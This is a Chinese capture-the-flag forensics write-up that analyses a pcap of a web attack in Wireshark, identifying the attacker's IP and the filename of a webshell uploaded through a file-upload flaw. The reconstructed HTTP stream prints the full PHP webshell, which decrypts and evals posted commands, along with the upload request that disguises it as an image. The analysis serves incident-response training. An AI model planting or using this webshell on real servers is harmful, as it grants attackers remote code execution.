题目描述 :开头的附件是本题使用的pcap文件,根据此文件需要解答以下8个问题。并最终组合成一个MD5形式的flag。
Q1. 黑客的 IP 地址是什么?
Q2. 黑客通过漏洞上传连接服务器的文件名字是什么?
Q3. 黑客上传的 Webshell 用的什么工具连接?
Q4. 黑客利用什么漏洞来进行攻击?
Q5. 黑客连接 Webshell 的连接密码是什么?
Q6. 黑客连接 Webshell 后执行的第一条系统命令是什么?
Q7. 黑客通过 Webshell 上传的文件内容是什么?
Q8. 黑客创建系统的用户名字叫什么?
Q1
思路 :
网络攻击中,黑客(攻击者)会与服务器保持频繁通信,因此筛选出通信最频繁的IP对话,然后确认哪一方是攻击方。
操作 :
打开wireshark软件,"Statistics" -> "Conversations" -> 勾选"IPv4",可以看到通信最频繁的是192.168.11.39与192.168.11.93间的对话,在这条记录中192.168.11.39为通信发起方,因此锁定黑客为192.168.11.39
Q2
思路 :
本小问在考察文件上传漏洞,可通过追踪上传动作本身(multipart/form-data)来找到webshell文件名。黑客通过POST请求提交webshell时数据包的Content-type一般是multipart/form-data,由此可筛选出相关的数据包,然后对数据包进行追踪流以还原黑客与服务器间的对话,从对话中找到上传的webshell名。
操作 :
Step1。筛选数据包。在wireshark中设置filter的http.request.method为POST、content_type包含"multipart",发现只有一个数据包Frame16651。
bash
http.request.method == POST && http.content_type contains "multipart/form-data"
Step2。对得到的这条数据包进行流追踪,我将关键信息放在下面的代码块中,可看到主机192.168.93发起了三轮对话:第一轮对话黑客发起POST请求,提交的表单里上传了一个名为san.php的文件(filename="san.php"),服务器返回HTTP/1.1 200 OK;由于客户端提交给服务器的木马一般会被重命名,于是黑客继续发起第二轮GET请求,服务器返回HTTP/1.1 200 OK并附带一大串HTML代码,在该代码底部写着uploads/1768728211_696ca6939300d_san.php其实就是黑客;拿到了真实路径后,黑客在第三轮对话中直接发起GET请求去访问前面提交的木马,服务器干净利落的返回了HTTP/1.1 200 OK。后续黑客就可以掏出像蚁剑、哥斯拉这样的工具开始远程控制服务器了。因此,上传连接服务器的文件名为1768728211_696ca6939300d_san.php
xml
POST /upload.php HTTP/1.1
Host: 192.168.11.93
Content-Length: 882
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://192.168.11.93
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUczYToC2RbAgYvPk
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
------WebKitFormBoundaryUczYToC2RbAgYvPk
Content-Disposition: form-data; name="file"; filename="san.php"
Content-Type: image/jpeg
<?php
@error_reporting(0);
$data = @$_POST['shell'];
if (isset($data)) {
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCd4MxZ+bp49Fy3KF/kfTUbOgaJ
VQTKVbvAEtA+mdowqmPZUKaE2R6EKgBoFSPdifyTtVDj3WjEezSYFiYOZlYwEYT6
RhzwnmczKI/QKDq1+BUZqKF0FdyoQVJIo/3M5t+uBVswwlQ5l+eBo9fCdXqrI5xJ
xib6Z/MRrAYtbLkykwIDAQAB
-----END PUBLIC KEY-----
EOF;
$pk_res = openssl_pkey_get_public($pk);
$chunks = explode("|", $data);
$payload = '';
foreach ($chunks as $chunk) {
$decrypted = '';
if (openssl_public_decrypt(base64_decode($chunk), $decrypted, $pk_res)) {
$payload .= $decrypted;
}
}
eval($payload);
}
?>
------WebKitFormBoundaryUczYToC2RbAgYvPk--
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
GET /admin.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="zh-CN">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>............ - ..................</title>
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
<style>
.admin-header {
background: linear-gradient(135deg, #2c3e50 0%, #34495e 100%);
color: white;
padding: 20px 0;
margin-bottom: 30px;
}
.admin-main {
min-height: 600px;
}
.admin-stats {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
gap: 20px;
margin-bottom: 30px;
}
.stat-card {
background: white;
padding: 25px;
border-radius: 12px;
box-shadow: 0 5px 15px rgba(0,0,0,0.05);
text-align: center;
transition: transform 0.3s;
}
.stat-card:hover {
transform: translateY(-5px);
}
.stat-icon {
font-size: 36px;
margin-bottom: 15px;
color: #3498db;
}
.stat-number {
font-size: 32px;
font-weight: bold;
color: #2c3e50;
margin-bottom: 10px;
}
.stat-label {
color: #666;
font-size: 14px;
}
.admin-actions {
display: grid;
grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));
gap: 20px;
margin: 30px 0;
}
.action-card {
background: white;
padding: 30px;
border-radius: 12px;
box-shadow: 0 5px 15px rgba(0,0,0,0.05);
text-decoration: none;
color: inherit;
transition: all 0.3s;
border-left: 4px solid #3498db;
}
.action-card:hover {
transform: translateY(-5px);
box-shadow: 0 15px 30px rgba(0,0,0,0.1);
background: #3498db;
color: white;
}
.action-card:hover .action-icon {
color: white;
}
.action-icon {
font-size: 32px;
color: #3498db;
margin-bottom: 15px;
}
.action-title {
font-size: 18px;
margin-bottom: 10px;
font-weight: 600;
}
.action-desc {
color: #666;
font-size: 14px;
}
.action-card:hover .action-desc {
color: rgba(255,255,255,0.9);
}
.admin-table-container {
background: white;
border-radius: 12px;
padding: 30px;
box-shadow: 0 5px 15px rgba(0,0,0,0.05);
margin-top: 30px;
overflow-x: auto;
}
.admin-table {
width: 100%;
border-collapse: collapse;
}
.admin-table th {
background: #f8f9fa;
color: #2c3e50;
font-weight: 600;
text-align: left;
padding: 15px;
border-bottom: 2px solid #e9ecef;
}
.admin-table td {
padding: 15px;
border-bottom: 1px solid #e9ecef;
}
.admin-table tr:hover {
background: #f8f9fa;
}
.file-cell {
display: flex;
align-items: center;
gap: 10px;
}
.file-cell i {
color: #3498db;
}
</style>
</head>
<body>
<header class="admin-header">
<div class="container">
<div class="header-top">
<div class="logo">
<i class="fas fa-tachometer-alt"></i>
<span>...............</span>
</div>
<div class="header-info">
<div class="info-item">
<i class="fas fa-user-shield"></i>
<span>............admin</span>
</div>
<div class="info-item">
<i class="fas fa-sign-out-alt"></i>
<span><a href="logout.php" style="color: white; text-decoration: none;">............</a></span>
</div>
</div>
</div>
<nav class="main-nav">
<ul>
<li class="active"><a href="admin.php"><i class="fas fa-tachometer-alt"></i> .........</a></li>
<li><a href="upload.php"><i class="fas fa-cloud-upload-alt"></i> ............</a></li>
<li><a href="view.php"><i class="fas fa-folder-open"></i> ............</a></li>
<li><a href="#"><i class="fas fa-users"></i> ............</a></li>
<li><a href="#"><i class="fas fa-chart-bar"></i> ............</a></li>
<li><a href="index.php"><i class="fas fa-home"></i> ............</a></li>
</ul>
</nav>
</div>
</header>
<main class="container admin-main">
<div class="admin-stats">
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-users"></i>
</div>
<div class="stat-number">4</div>
<div class="stat-label">............</div>
</div>
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-file-alt"></i>
</div>
<div class="stat-number">6</div>
<div class="stat-label">............</div>
</div>
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-cloud-upload-alt"></i>
</div>
<div class="stat-number">6</div>
<div class="stat-label">............</div>
</div>
<div class="stat-card">
<div class="stat-icon">
<i class="fas fa-hdd"></i>
</div>
<div class="stat-number">
0 </div>
<div class="stat-label">............(MB)</div>
</div>
</div>
<h2 class="section-title"><i class="fas fa-welcome"></i> ...........................</h2>
<p style="color: #666; margin-bottom: 30px;">.....................................................................</p>
<div class="admin-actions">
<a href="upload.php" class="action-card">
<div class="action-icon">
<i class="fas fa-cloud-upload-alt"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">...........................</p>
</a>
<a href="view.php" class="action-card">
<div class="action-icon">
<i class="fas fa-folder-open"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">...........................</p>
</a>
<a href="#" class="action-card">
<div class="action-icon">
<i class="fas fa-users-cog"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">...........................</p>
</a>
<a href="#" class="action-card">
<div class="action-icon">
<i class="fas fa-chart-line"></i>
</div>
<h3 class="action-title">............</h3>
<p class="action-desc">..............................</p>
</a>
</div>
<div class="admin-table-container">
<h3 class="section-title" style="margin-top: 0;"><i class="fas fa-history"></i> .....................</h3>
<table class="admin-table">
<thead>
<tr>
<th>.........</th>
<th>......</th>
<th>............</th>
<th>......</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-code"></i>
<span>san.php</span>
</div>
</td>
<td>0.7 KB</td>
<td>2026-01-18 17:23</td>
<td>
<a href="uploads/1768728211_696ca6939300d_san.php"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768728211_696ca6939300d_san.php"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-code"></i>
<span>san.php</span>
</div>
</td>
<td>0.7 KB</td>
<td>2026-01-18 15:31</td>
<td>
<a href="uploads/1768721510_696c8c668ba5e_san.php"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768721510_696c8c668ba5e_san.php"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-code"></i>
<span>san.php</span>
</div>
</td>
<td>0.5 KB</td>
<td>2026-01-18 15:18</td>
<td>
<a href="uploads/1768720729_696c89591a5fc_san.php"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768720729_696c89591a5fc_san.php"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-image"></i>
<span>san.jpg</span>
</div>
</td>
<td>0.5 KB</td>
<td>2026-01-18 15:18</td>
<td>
<a href="uploads/1768720704_696c8940c0407_san.jpg"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768720704_696c8940c0407_san.jpg"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
<tr>
<td>
<div class="file-cell">
<i class="fas fa-file-image"></i>
<span>san.jpg</span>
</div>
</td>
<td>0.5 KB</td>
<td>2026-01-18 15:08</td>
<td>
<a href="uploads/1768720109_696c86ed6d272.jpg"
class="btn btn-primary btn-small"
target="_blank">
<i class="fas fa-eye"></i> ......
</a>
<a href="uploads/1768720109_696c86ed6d272.jpg"
class="btn btn-secondary btn-small"
download>
<i class="fas fa-download"></i> ......
</a>
</td>
</tr>
</tbody>
</table>
<div style="text-align: center; margin-top: 20px;">
<a href="view.php" class="btn btn-outline">..................</a>
</div>
</div>
</main>
</body>
</html>
GET /uploads/1768728211_696ca6939300d_san.php HTTP/1.1
Host: 192.168.11.93
Accept-Language: zh-CN,zh;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.11.93/admin.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=u8phum51cs6vl9fhbtl4c51rg5
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx/1.15.11
Date: Sun, 18 Jan 2026 09:23:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.3.4